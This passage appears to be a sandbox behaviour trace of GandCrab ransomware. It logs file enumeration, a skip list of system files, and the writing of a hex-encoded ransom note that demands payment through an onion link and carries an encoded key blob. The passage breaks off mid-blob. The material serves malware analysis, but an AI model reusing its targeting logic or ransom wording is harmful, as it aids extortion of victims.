(lpString1="TITWMVJL-DECRYPT.txt", lpString2="ntuser.dat") returned 1 [0091.212] lstrcmpiW (lpString1="TITWMVJL-DECRYPT.txt", lpString2="iconcache.db") returned 1 [0091.212] lstrcmpiW (lpString1="TITWMVJL-DECRYPT.txt", lpString2="bootsect.bak") returned 1 [0091.212] lstrcmpiW (lpString1="TITWMVJL-DECRYPT.txt", lpString2="boot.ini") returned 1 [0091.212] lstrcmpiW (lpString1="TITWMVJL-DECRYPT.txt", lpString2="ntuser.dat.log") returned 1 [0091.212] lstrcmpiW (lpString1="TITWMVJL-DECRYPT.txt", lpString2="thumbs.db") returned 1 [0091.212] VirtualFree (lpAddress=0x1e70000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0091.212] FindNextFileW (in: hFindFile=0x503638, lpFindFileData=0x259f290 | out: lpFindFileData=0x259f290) returned 1 [0091.212] lstrcmpW (lpString1="_private", lpString2=".") returned 1 [0091.212] lstrcmpW (lpString1="_private", lpString2="..") returned 1 [0091.212] lstrcatW (in: lpString1="C:\\Users\\CIiHmnxMn6Ps\\Documents\\My Shapes\\", lpString2="_private" | out: lpString1="C:\\Users\\CIiHmnxMn6Ps\\Documents\\My Shapes\\_private") returned="C:\\Users\\CIiHmnxMn6Ps\\Documents\\My Shapes\\_private" [0091.213] lstrcatW (in: lpString1="C:\\Users\\CIiHmnxMn6Ps\\Documents\\My Shapes\\_private", lpString2="\\" | out: lpString1="C:\\Users\\CIiHmnxMn6Ps\\Documents\\My Shapes\\_private\\") returned="C:\\Users\\CIiHmnxMn6Ps\\Documents\\My Shapes\\_private\\" [0091.213] VirtualAlloc (lpAddress=0x0, dwSize=0x201, flAllocationType=0x3000, flProtect=0x40) returned 0x1e70000 [0091.213] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x75310000 [0091.213] SHGetSpecialFolderPathW (in: hwnd=0x0, pszPath=0x1e70000, csidl=42, fCreate=0 | out: pszPath="C:\\Program Files (x86)") returned 1 [0091.213] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x75310000 [0091.213] SHGetSpecialFolderPathW (in: hwnd=0x0, pszPath=0x1e70000, csidl=43, fCreate=0 | out: pszPath="C:\\Program Files (x86)\\Common Files") returned 1 [0091.213] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x75310000 [0091.213] SHGetSpecialFolderPathW (in: hwnd=0x0, pszPath=0x1e70000, csidl=36, fCreate=0 | out: pszPath="C:\\Windows") returned 1 [0091.214] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x75310000 [0091.214] SHGetSpecialFolderPathW (in: hwnd=0x0, pszPath=0x1e70000, csidl=28, fCreate=0 | out: pszPath="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local") returned 1 [0091.214] VirtualFree (lpAddress=0x1e70000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0091.214] VirtualAlloc (lpAddress=0x0, dwSize=0x400, flAllocationType=0x3000, flProtect=0x4) returned 0x1e70000 [0091.214] wsprintfW (in: param_1=0x1e70200, param_2="%s\\%s-DECRYPT.txt" | out: param_1="C:\\Users\\CIiHmnxMn6Ps\\Documents\\My Shapes\\_private\\\\TITWMVJL-DECRYPT.txt") returned 72 [0091.214] CreateFileW (lpFileName="C:\\Users\\CIiHmnxMn6Ps\\Documents\\My Shapes\\_private\\\\TITWMVJL-DECRYPT.txt" (normalized: "c:\\users\\ciihmnxmn6ps\\documents\\my shapes\\_private\\titwmvjl-decrypt.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x2b4 [0091.215] lstrlenW (lpString="\xfeff\x2d\x2d\x2d\x3d\x20\x20\x20\x20\x47\x41\x4e\x44\x43\x52\x41\x42\x20\x56\x35\x2e\x32\x20\x20\x20\x20\x3d\x2d\x2d\x2d\x20\x0d\x0a\x0d\x0a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x55\x4e\x44\x45\x52\x20\x4e\x4f\x20\x43\x49\x52\x43\x55\x4d\x53\x54\x41\x4e\x43\x45\x53\x20\x44\x4f\x20\x4e\x4f\x54\x20\x44\x45\x4c\x45\x54\x45\x20\x54\x48\x49\x53\x20\x46\x49\x4c\x45\x2c\x20\x55\x4e\x54\x49\x4c\x20\x41\x4c\x4c\x20\x59\x4f\x55\x52\x20\x44\x41\x54\x41\x20\x49\x53\x20\x52\x45\x43\x4f\x56\x45\x52\x45\x44\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x0d\x0a\x0d\x0a\x09\x2a\x2a\x2a\x2a\x2a\x46\x41\x49\x4c\x49\x4e\x47\x20\x54\x4f\x20\x44\x4f\x20\x53\x4f\x2c\x20\x57\x49\x4c\x4c\x20\x52\x45\x53\x55\x4c\x54\x20\x49\x4e\x20\x59\x4f\x55\x52\x20\x53\x59\x53\x54\x45\x4d\x20\x43\x4f\x52\x52\x55\x50\x54\x49\x4f\x4e\x2c\x20\x49\x46\x20\x54\x48\x45\x52\x45\x20\x41\x52\x45\x20\x44\x45\x43\x52\x59\x50\x54\x49\x4f\x4e\x20\x45\x52\x52\x4f\x52\x53\x2a\x2a\x2a\x2a\x2a\x0d\x0a\x0d\x0a\x41\x74\x74\x65\x6e\x74\x69\x6f\x6e\x21\x20\x0d\x0a\x0d\x0a\x41\x6c\x6c\x20\x79\x6f\x75\x72\x20\x66\x69\x6c\x65\x73\x2c\x20\x64\x6f\x63\x75\x6d\x65\x6e\x74\x73\x2c\x20\x70\x68\x6f\x74\x6f\x73\x2c\x20\x64\x61\x74\x61\x62\x61\x73\x65\x73\x20\x61\x6e\x64\x20\x6f\x74\x68\x65\x72\x20\x69\x6d\x70\x6f\x72\x74\x61\x6e\x74\x20\x66\x69\x6c\x65\x73\x20\x61\x72\x65\x20\x65\x6e\x63\x72\x79\x70\x74\x65\x64\x20\x61\x6e\x64\x20\x68\x61\x76\x65\x20\x74\x68\x65\x20\x65\x78\x74\x65\x6e\x73\x69\x6f\x6e\x3a\x20\x2e\x54\x49\x54\x57\x4d\x56\x4a\x4c\x20\x20\x20\x20\x20\x0d\x0a\x0d\x0a\x54\x68\x65\x20\x6f\x6e\x6c\x79\x20\x6d\x65\x74\x68\x6f\x64\x20\x6f\x66\x20\x72\x65\x63\x6f\x76\x65\x72\x69\x6e\x67\x20\x66\x69\x6c\x65\x73\x20\x69\x73\x20\x74\x6f\x20\x70\x75\x72\x63\x68\x61\x73\x65\x20\x61\x6e\x20\x75\x6e\x69\x71\x75\x65\x20\x70\x72\x69\x76\x61\x74\x65\x20\x6b\x65\x79\x2e\x20\x4f\x6e\x6c\x79\x20\x77\x65\x20\x63\x61\x6e\x20\x67\x69\x76\x65\x20\x79\x6f\x75\x20\x74\x68\x69\x73\x20\x6b\x65\x79\x20\x61\x6e\x64\x20\x6f\x6e\x6c\x79\x20\x77\x65\x20\x63\x61\x6e\x20\x72\x65\x63\x6f\x76\x65\x72\x20\x79\x6f\x75\x72\x20\x66\x69\x6c\x65\x73\x2e\x0d\x0a\x0d\x0a\x0d\x0a\x54\x68\x65\x20\x73\x65\x72\x76\x65\x72\x20\x77\x69\x74\x68\x20\x79\x6f\x75\x72\x20\x6b\x65\x79\x20\x69\x73\x20\x69\x6e\x20\x61\x20\x63\x6c\x6f\x73\x65\x64\x20\x6e\x65\x74\x77\x6f\x72\x6b\x20\x54\x4f\x52\x2e\x20\x59\x6f\x75\x20\x63\x61\x6e\x20\x67\x65\x74\x20\x74\x68\x65\x72\x65\x20\x62\x79\x20\x74\x68\x65\x20\x66\x6f\x6c\x6c\x6f\x77\x69\x6e\x67\x20\x77\x61\x79\x73\x3a\x0d\x0a\x0d\x0a\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x0d\x0a\x0d\x0a\x7c\x20\x30\x2e\x20\x44\x6f\x77\x6e\x6c\x6f\x61\x64\x20\x54\x6f\x72\x20\x62\x72\x6f\x77\x73\x65\x72\x20\x2d\x20\x68\x74\x74\x70\x73\x3a\x2f\x2f\x77\x77\x77\x2e\x74\x6f\x72\x70\x72\x6f\x6a\x65\x63\x74\x2e\x6f\x72\x67\x2f\x20\x0d\x0a\x0d\x0a\x7c\x20\x31\x2e\x20\x49\x6e\x73\x74\x61\x6c\x6c\x20\x54\x6f\x72\x20\x62\x72\x6f\x77\x73\x65\x72\x20\x0d\x0a\x7c\x20\x32\x2e\x20\x4f\x70\x65\x6e\x20\x54\x6f\x72\x20\x42\x72\x6f\x77\x73\x65\x72\x20\x0d\x0a\x7c\x20\x33\x2e\x20\x4f\x70\x65\x6e\x20\x6c\x69\x6e\x6b\x20\x69\x6e\x20\x54\x4f\x52\x20\x62\x72\x6f\x77\x73\x65\x72\x3a\x20\x20\x20\x68\x74\x74\x70\x3a\x2f\x2f\x67\x61\x6e\x64\x63\x72\x61\x62\x6d\x66\x65\x36\x6d\x6e\x65\x66\x2e\x6f\x6e\x69\x6f\x6e\x2f\x39\x39\x38\x61\x32\x66\x34\x35\x64\x32\x63\x61\x34\x64\x65\x66\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x0d\x0a\x7c\x20\x34\x2e\x20\x46\x6f\x6c\x6c\x6f\x77\x20\x74\x68\x65\x20\x69\x6e\x73\x74\x72\x75\x63\x74\x69\x6f\x6e\x73\x20\x6f\x6e\x20\x74\x68\x69\x73\x20\x70\x61\x67\x65\x20\x0d\x0a\x0d\x0a\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x0d\x0a\x20\x20\x20\x20\x0d\x0a\x0d\x0a\x4f\x6e\x20\x6f\x75\x72\x20\x70\x61\x67\x65\x20\x79\x6f\x75\x20\x77\x69\x6c\x6c\x20\x73\x65\x65\x20\x69\x6e\x73\x74\x72\x75\x63\x74\x69\x6f\x6e\x73\x20\x6f\x6e\x20\x70\x61\x79\x6d\x65\x6e\x74\x20\x61\x6e\x64\x20\x67\x65\x74\x20\x74\x68\x65\x20\x6f\x70\x70\x6f\x72\x74\x75\x6e\x69\x74\x79\x20\x74\x6f\x20\x64\x65\x63\x72\x79\x70\x74\x20\x31\x20\x66\x69\x6c\x65\x20\x66\x6f\x72\x20\x66\x72\x65\x65\x2e\x20\x0d\x0a\x0d\x0a\x0d\x0a\x41\x54\x54\x45\x4e\x54\x49\x4f\x4e\x21\x0d\x0a\x0d\x0a\x49\x4e\x20\x4f\x52\x44\x45\x52\x20\x54\x4f\x20\x50\x52\x45\x56\x45\x4e\x54\x20\x44\x41\x54\x41\x20\x44\x41\x4d\x41\x47\x45\x3a\x0d\x0a\x0d\x0a\x2a\x20\x44\x4f\x20\x4e\x4f\x54\x20\x4d\x4f\x44\x49\x46\x59\x20\x45\x4e\x43\x52\x59\x50\x54\x45\x44\x20\x46\x49\x4c\x45\x53\x0d\x0a\x2a\x20\x44\x4f\x20\x4e\x4f\x54\x20\x43\x48\x41\x4e\x47\x45\x20\x44\x41\x54\x41\x20\x42\x45\x4c\x4f\x57\x0d\x0a\x0d\x0a\x2d\x2d\x2d\x42\x45\x47\x49\x4e\x20\x47\x41\x4e\x44\x43\x52\x41\x42\x20\x4b\x45\x59\x2d\x2d\x2d\x0d\x0a\x6c\x41\x51\x41\x41\x42\x42\x6a\x58\x74\x68\x4a\x35\x51\x30\x77\x50\x44\x4f\x69\x52\x2f\x55\x55\x71\x42\x6a\x71\x4e\x47\x47\x52\x4d\x53\x45\x54\x66\x6e\x4b\x46\x4e\x2f\x77\x43\x30\x5a\x32\x79\x38\x75\x58\x4e\x4b\x2f\x63\x51\x52\x78\x51\x2b\x75\x78\x6a\x76\x48\x59\x6f\x52\x4e\x57\x4b\x4f\x77\x79\x70\x66\x53\x6e\x77\x69\x73\x61\x7a\x66\x6f\x32\x49\x75\x35\x76\x57\x57\x2b\x52\x43\x6b\x47\x47\x42\x31\x47\x6e\x65\x73\x51\x6b\x51\x77\x75\x54\x32\x41\x5a\x78\x56\x78\x35\x51\x59\x34\x69\x65\x2b\x6c\x65\x57\x2f\x4d\x5a\x41\x77\x47\x50\x70\x7a\x38\x2f\x37\x64\x5a\x77\x6f\x4c\x2b\x55\x71\x71\x4f\x77\x4d\x70\x54\x47\x33\x2b\x41\x6e\x76\x45\x51\x33\x4c\x4d\x6e\x49\x69\x51\x63\x70\x34\x48\x44\x66\x64\x33\x38\x4d\x50\x52\x43\x73\x52\x36\x67\x71\x63\x49\x48\x6f\x42\x70\x55\x4c\x77\x43\x33\x47\x6d\x37\x78\x7a\x74\x5a\x42\x69\x48\x47\x5a\x67\x5a\x56\x37\x4c\x6e\x61\x67\x51\x6b\x72\x4f\x41\x6c\x77\x54\x31\x36\x69\x70\x71\x4c\x31\x7a\x58\x54\x34\x6b\x4f\x79\x47\x45\x5a\x4c\x53\x6c\x71\x36\x48\x52\x57\x72\x52\x4a\x6b\x59\x53\x51\x35\x7a\x4c\x74\x50\x31\x54\x6b\x34\x68\x6d\x6d\x42\x51\x31\x66\x6f\x6a\x57\x46\x72\x63\x6f\x54\x34\x36\x78\x63\x76\x57\x2b\x33\x53\x33\x30\x6e\x56\x30\x46\x43\x51\x59\x64\x6a\x35\x68\x48\x66\x62\x50\x6c\x62\x4f\x52\x5a\x72\x69\x34\x6e\x2b\x65\x55\x43\x49\x6c\x46\x31\x74\x4b\x78\x62\x45\x69\x51\x74\x4a\x4e\x74\x66\x66\x74\x31\x76\x6b\x59\x31\x62\x6e\x78\x49\x64\x74\x45\x74\x57\x62\x49\x4e\x77\x6c\x75\x6e\x2f\x31\x39\x37\x67\x4f\x72\x72\x49\x58\x4a\x2b\x45\x70\x37\x61\x31\x73\x34\x68\x41\x54\x32\x6b\x45\x6b\x6d\x31\x48\x55\x4e\x39\x39\x46\x55\x4d\x7a\x2b\x49\x73\x51\x45\x4b\x35\x41\x44\x59\x6d\x35\x4a\x73\x42\x55\x61\x63\x59\x6c\x58\x52\x65\x77\x77\x78\x4e\x41\x55\x67\x6b\x77\x54\x51\x31\x69\x78\x57\x48\x63\x68\x36\x4c\x4e\x66\x6f\x46\x62\x78\x2f\x59\x30\x51\x67\x6c\x59\x47\x6c\x37\x36\x62\x4c\x67\x6c\x6a\x67\x6c\x50\x69\x61\x72\x2b\x46\x4d\x6d\x73\x4a\x6b\x48\x44\x78\x58\x46\x41\x64\x70\x56\x50\x4d\x4b\x54\x2b\x50\x70\x63\x6e\x32\x67\x31\x52\x65\x6f\x6d\x79\x5a\x73\x41\x77\x33\x30\x68\x4e\x4d\x79\x59\x43\x74\x79\x7a\x59\x56\x6d\x51\x7a\x4e\x56\x56\x77\x65\x76\x4d\x6b\x70\x71\x33\x44\x66\x76\x30\x76\x48\x65\x43\x6a\x58\x63\x30\x71\x67\x72\x38\x48\x53\x78\x6f\x57\x53\x6c\x56\x42\x7a\x55\x4c\x72\x47\x64\x77\x71\x7a\x61\x62\x59\x79\x6f\x72\x78\x32\x77\x62\x32\x6c\x50\x71\x6e\x43\x73\x4c\x2f\x59\x4f\x74\x63\x72\x69\x65\x50\x62\x77\x73\x57\x59\x46\x5a\x51\x47\x46\x63\x31\x4a\x6f\x71\x4a\x4a\x5a\x35\x4a\x74\x74\x4a\x35\x31\x45\x4c\x44\x52\x43\x4e\x4d\x44\x68\x74\x5a\x76\x42\x66\x61\x49\x7a\x65\x39\x54\x5a\x4c\x52\x61\x43\x42\x69\x30\x4d\x4a\x68\x54\x57\x30\x38\x74\x63\x66\x54\x6f\x62\x4a\x76\x4a\x30\x4d\x39\x34\x56\x62\x51\x44\x76\x2b\x4e\x51\x37\x6e\x6b\x78\x69\x35\x53\x33\x38\x67\x32\x46\x72\x4d\x38\x48\x75\x66\x71\x71\x49\x34\x5a\x67\x4c\x6f\x71\x43\x74\x45\x5a\x44\x67\x69\x62\x74\x42\x77\x51\x7a\x6d\x77\x30\x55\x2b\x64\x2f\x66\x69\x6d\x4d\x4e\x57\x66\x77\x4f\x55\x35\x65\x36\x77\x50\x4e\x6a\x50\x48\x5a\x6a\x73\x57\x38\x2f\x34\x48\x66\x30\x66\x67\x58\x41\x76\x42\x32\x2b\x67\x6b\x76\x52\x73\x75\x48\x53\x69\x75\x57\x53\x30\x5a\x78\x7a\x2f\x41\x42\x33\x4e\x69\x47\x4f\x64\x5a\x50\x64\x78\x72\x71\x4b\x71\x59\x49\x42\x4f\x6b\x4b\x35\x47\x48\x36\x6e\x39\x31\x51\x69\x74\x2f\x43\x66\x46\x66\x4e\x43\x68\x51\x59\x79\x73\x59\x48\x69\x45\x55\x31\x6d\x43\x4a\x2f\x46\x2f\x42\x6d\x65\x4a\x79\x37\x74\x41\x30\x55\x72\x62\x72\x6f\x4c\x53\x66\x45\x74\x7a\x53\x78\x63\x36\x4e\x73\x54\x48\x41\x65\x65\x6d\x48\x6e\x4e\x77\x38\x6d\x4c\x56\x41\x70\x52\x6e\x68\x50\x42\x36\x73\x36\x69\x5a\x66\x59\x6b\x62\x6f\x44\x4c\x45\x37\x64\x72\x56\x44\x6c\x52\x72\x66\x7a\x62\x6f\x63\x31\x56\x6e\x47\x76\x46\x66\x46\x42\x66\x2b\x5a\x37\x6b\x2b\x57\x55\x76\x6b\x6b\x68\x63\x41\x43\x5a\x69\x4b\x74\x6c\x50\x62\x70\x35\x34\x53\x2f\x73\x2b\x55\x73\x6d\x4e\x48\x6a\x55\x4e\x52\x36\x44\x78\x53\x49\x32\x31\x75\x61\x45\x50\x32\x4d\x30\x71\x75\x57\x53\x65\x46\x4a\x38\x77\x76\x61\x2b\x6e\x2f\x6c\x47\x35\x58\x75\x4c\x78\x4b\x4d\x59\x53\x44\x48\x4f\x61\x39\x79\x73\x34\x31\x48\x69\x51\x7a\x43\x33\x41\x33\x52\x67\x73\x2f\x78\x58\x4f\x74\x66\x4d\x31\x78\x6b\x56\x4d\x65\x6c\x5a\x78\x39\x64\x67\x6c\x6f\x66\x33\x34\x4a\x34\x47\x61\x6f\x45\x37\x53\x64\x34\x75\x41\x32\x6b\x79\x61\x4c\x76\x57\x62\x44\x43\x68\x55\x38\x5a\x46\x48\x48\x2b\x4c\x4f\x43\x66\x56\x41\x5a\x61\x48\x34\x55\x6e\x42\x65\x48\x63\x37\x68\x70\x36\x43\x53\x6a\x30\x4b\x77\x73\x31\x68\x30\x31\x46\x63\x58\x67\x74\x76\x6a\x43\x6e\x41\x70\x6a\x55\x37\x46\x72\x59\x53\x42\x43\x72\x77\x7a\x53\x73\x58\x4f\x55\x6b\x36\x41\x43\x34\x37\x41\x69\x56\x69\x48\x2f\x71\x45\x66\x42\x34\x44\x73\x66\x33\x72\x4e\x59\x38\x4a\x44\x62\x51\x54\x44\x72\x73\x57\x7a\x49\x39\x6f\x62\x71\x4e\x53\x4f\x46\x65\x2f\x4a\x4f\x73\x64\x4e\x4e\x56\x6c\x78\x39\x67\x51\x31\x79\x57\x59\x38\x4e\x65\x33\x51\x33\x76\x71\x62\x32\x61\x4e\x67\x6c\x67\x35\x2b\x6d\x6e\x66\x72\x4f\x50\x62\x51\x4a\x33\x66\x36\x53\x48\x79\x52\x53\x63\x68\x6f\x44\x72\x4a\x66\x7a\x38\x43\x69\x78\x75\x39\x53\x6b\x39\x38\x44\x59\x57\x66\x6a\x6e\x73\x70\x75\x35\x59\x64\x2f\x50\x78\x47\x44\x32\x55\x4f\x62\x6b\x30\x62\x68\x65\x4d\x78\x68\x52\x69\x73\x42\x63\x39\x42\x63\x7a\x53\x4f\x4c\x2b\x36\x74\x6c\x65\x62\x68\x42\x6d\x54\x68\x38\x4c\x46\x61\x56\x6f\x6d\x4b\x31\x53\x38\x75\x7a\x74\x73\x68\x52\x56\x63\x4f\x4a\x68\x70\x37\x6f\x2b\x48\x56\x35\x64\x51\x54\x35\x77\x41\x4c\x53\x79\x4c\x36\x67\x4e\x52\x47\x6e\x4f\x6a\x35\x34\x58\x51\x36\x75\x35\x36\x48\x2f\x70\x6a\x63\x2b\x54\x4b\x6c\x59\x30\x61\x57\x52\x76\x38\x76\x65\x63\x59\x44\x52\x44\x48\x4c\x55\x6e\x45\x48\x41\x42\x4c\x46\x71\x4a\x50\x36\x58\x79\x64\x31\x48\x53\x57\x32\x36\x4b\x65\x74\x6a\x56\x37\x4b\x6e\x42\x49\x68\x39\x46\x5a\x68\x67\x6b\x61\x64\x68\x71\x4f\x57\x75\x55\x67\x66\x6f\x53\x6f\x62\x72\x32\x61\x4d\x37\x59\x4f\x6a\x67\x5a\x52\x68\x44\x69\x6e\x59\x62\x31\x73\x54\x49\x49\x77\x62\x6d\x63\x64\x6f\x55\x45\x45\x62\x6a\x4c\x50\x7a\x33\x35\x2f\x70\x44\x62\x33\x72\x4b\x2f\x6a\x65\x53\x62\x43\x61\x70\x43\x68\x33\x7a\x43\x66\x66\x48\x72\x31\x68\x39\x58\x59\x57\x4c\x37\x6f\x67\x6c\x4b\x31\x49\x79\x39\x53\x6e\x50\x7a\x72\x4e\x74\x77\x35\x69\x6e\x6e\x35\x67\x46\x2f\x54\x62\x32\x32\x2f\x64\x78\x34\x2b\x32\x53\x61\x55\x48\x50\x78\x54\x79\x70\x4f\x79\x6b\x62\x66\x6a\x72\x57\x7a\x4e\x79\x4e\x34\x74\x38\x54\x70\x4a\x6d\x6a\x64\x76\x6d\x31\x41\x6c\x38\x53\x54\x53\x51\x73\x76\x76\x52\x55\x37\x45\x43\x61\x52\x37\x6e\x4c\x32\x41\x64\x42\x4e\x36\x4a\x32\x6d\x35\x6a\x6d\x64\x78\x54\x5a\x79\x64\x77\x4a\x50\x6e\x36\x31\x63\x70\x46\x39\x6b\x71\x44\x77\x2f\x74\x76\x4c\x4f\x4c\x4a\x43\x43\x7a\x56\x32\x5a\x44\x48\x33\x4f\x49\x6d\x56\x75\x69\x6e\x67\x31\x6c\x31\x65\x62\x63\x65\x42\x53\x45\x6a\x6f\x36\x52\x61\x36\x7a\x67\x75\x31\x4d\x6a\x32\x63\x58\x39\x57\x4d\x77\x31\x50\x78\x30\x53\x64\x32\x6c\x4d\x75\x77\x6d\x51\x6b\x34\x30\x36\x4f\x49\x64\x4c\x64\x55\x64\x34\x67\x6c\x71\x66\x30\x55\x48\x72\x38\x64\x66\x47\x4a\x79\x66\x62\x61\x4a\x45\x4c\x63\x74\x56\x36\x67\x36\x2b\x6e\x35\x66\x44\x71\x36\x56\x51\x41\x30\x72\x78\x78\x74\x79\x76\x6b\x43\x74\x68\x6d\x52\x4c\x73\x54\x67\x66\x4f\x6f\x58\x65\x34\x47\x37\x68\x39\x69\x4e\x75\x65\x73\x6f\x4d\x72\x30\x50\x6f\x61\x38\x6b\x4a\x5a\x54\x56\x68\x66\x33\x77\x54\x2f\x75\x75\x79\x64\x4d\x79\x55\x70\x63\x6c\x53\x49\x6a\x71\x2b\x66\x55\x49\x52\x72\x2b\x37\x6b\x2f\x57\x39\x4f\x39\x56\x73\x79\x32\x4e\x63\x78\x35\x70\x66\x2b\x53\x2b\x4d\x72\x4c\x31\x41\x6d\x35\x52\x51\x69\x33\x63\x36\x78\x46\x65\x54\x78\x33\x4d\x63\x5a\x52\x38\x30\x6e\x56\x69\x6e\x68\x75\x59\x6c\x69\x52\x51\x68\x4b\x4e\x6f\x4e\x57\x49\x32\x67\x48\x61\x47\x36\x6c\x52\x75\x7a\x2b\x51\x68\x47\x30\x52\x70\x4d\x59\x62\x7a\x42\x67\x4f\x6a\x35\x68\x69\x2f\x63\x63\x79\x55\x79\x68\x4d\x35\x66\x55\x49\x67\x63\x4a\x31\x39\x6c\x50\x64\x63\x6d\x76\x69\x78\x47\x6c\x6b\x35\x52\x38\x72\x6b\x32\x5a\x66\x78\x68\x4a\x78\x72\x46\x49\x75\x4c\x51\x54\x73\x52\x72\x61\x69\x77\x63\x44\x4d\x54\x41\x6d\x39\x63\x38\x6b\x64\x72\x2f\x59\x66\x34\x51\x6e\x2b\x62\x76\x37\x79\x4a\x5a\x34\x59\x58\x67\x42\x38\x45\x64\x6c\x31\x58\x64\x53\x6e\x4d\x72\x55\x50\x56\x35\x6f\x72\x63\x42\x78\x33\x32\x65\x73\x48\x6c\x31\x62\x46\x48\x6b\x65\x73\x39\x5a\x39\x66\x77\x6a\x46\x46\x78\x35\x42\x2f\x43\x72\x79\x6e\x36\x49\x30\x62\x54\x68\x36\x53\x78\x71\x78\x53\x4d\x4b\x66\x61\x77\x6c\x59\x6a\x57\x52\x79\x70\x35\x79\x58\x74\x4e\x69\x62\x62\x2b\x63\x7a\x78\x54\x77\x67\x30\x35\x57\x45\x56\x69\x44\x6a\x32\x5a\x4d\x35\x56\x46\x45\x35\x67\x39\x6a\x56\x78\x31\x7a\x4c\x67\x4c\x36\x72\x45\x6f\x78\x76\x62\x50\x33\x2f\x6f\x57\x73\x72\x33\x72\x72\x35\x38\x63\x71\x62\x45\x36\x49\x49\x48\x34\x6b\x33\x74\x74\x34\x75\x37\x69\x71\x7a\x66\x55\x6b\x4a\x6d\x48\x2b\x38\x31\x76\x5a\x62\x56\x7a\x59\x48\x63\x36\x48\x51\x4c\x2f\x56\x4c\x6d\x74\x2b\x59\x37\x68\x52\x6b\x36\x79\x6f\x72\x53\x6a\x31\x70\x6d\x69\x50\x46\x72\x58\x4c\x39\x39\x57\x72\x62\x6c\x41\x59\x36\x4e\x71\x79\x68\x32\x6d\x78\x2f\x6a\x4b\x44\x58\x4d\x5a\x7a\x64\x6c\x55\x51\x32\x4d\x35\x67\x6a\x56\x6c\x38\x36\x6c\x4e\x43\x6f\x33\x37\x4c\x44\x4c\x56\x48\x55\x4a\x64\x38\x73\x75\x41\x37\x78\x48\x61\x76\x47\x4b\x4d\x42\x7a\x7a\x78\x38\x35\x70\x2b\x4a\x2f\x55\x56\x39\x57\x50\x58\x6e\x72\x75\x45\x41\x3d\x0d\x0a\x2d\x2d\x2d\x45\x4e\x44\x20\x47\x41\x4e\x44\x43\x52\x41\x42\x20\x4b\x45\x59\x2d\x2d\x2d\x0d\x0a\x0d\x0a\x2d\x2d\x2d\x42\x45\x47\x49\x4e\x20\x50\x43\x20\x44\x41\x54\x41\x2d\x2d\x2d\x0d\x0a\x37\x66\x74\x44\x45\x67\x4c\x62\x2f\x5a\x53\x30\x6c\x63\x6d\x5a\x62\x48\x4d\x36\x31\x4b\x4c\x4a\x78\x51\x4f\x70\x44\x35\x34\x4b\x6b\x77\x36\x53\x62\x73\x73\x67\x66\x33\x59\x41\x57\x4f\x4d\x43\x79\x70\x2b\x4b\x59\x42\x78\x78\x47\x32\x44\x64\x39\x4d\x50\x4a\x45\x70\x44\x37\x41\x73\x6d\x56\x67\x4f\x43\x39\x52\x57\x66\x49\x52\x48\x51\x70\x51\x78\x47\x61\x31\x4c\x50\x47\x7a\x72\x45\x53\x47\x2b\x67\x67\x61\x72\x47\x58\x6f\x36\x62\x63\x47\x50\x4d\x70\x59\x30\x75\x48\x49\x6b\x6d\x67\x32\x38\x51\x55\x71\x68\x54\x73\x67\x6b\x67\x59\x58\x56\x70\x69\x44\x63\x46\x77\x69\x58\x48\x2f\x67\x6c\x4b\x56\x57\x6f\x56\x48\x4b\x43\x50\x5a\x4d\x70\x76\x37\x34\x43\x5a\x32\x4f\x38\x51\x33\x7a\x57\x61\x78\x30\x4b\x49\x52\x43\x2f\x6f\x76\x45\x74\x76\x42\x6d\x64\x6c\x53\x73\x70\x6d\x48\x4e\x76\x55\x46\x49\x4b\x6c\x30\x57\x59\x4e\x61\x41\x79\x77\x30\x53\x4b\x36\x62\x44\x4c\x6c\x46\x33\x79\x50\x71\x42\x35\x67\x6d\x61\x62\x46\x2b\x5a\x2f\x58\x4d\x47\x64\x33\x73\x67\x44\x37\x32\x35\x4a\x33\x2f\x55\x77\x42\x37\x77\x39\x78\x45\x57\x4c\x30\x79\x37\x34\x58\x71\x35\x33\x74\x48\x52\x6e\x4b\x53\x4d\x4a\x2b\x42\x6c\x31\x44\x7a\x65\x69\x71\x6f\x39\x46\x72\x64\x6e\x4d\x4b\x5a\x37\x31\x39\x47\x53\x56\x66\x4f\x2b\x54\x41\x69\x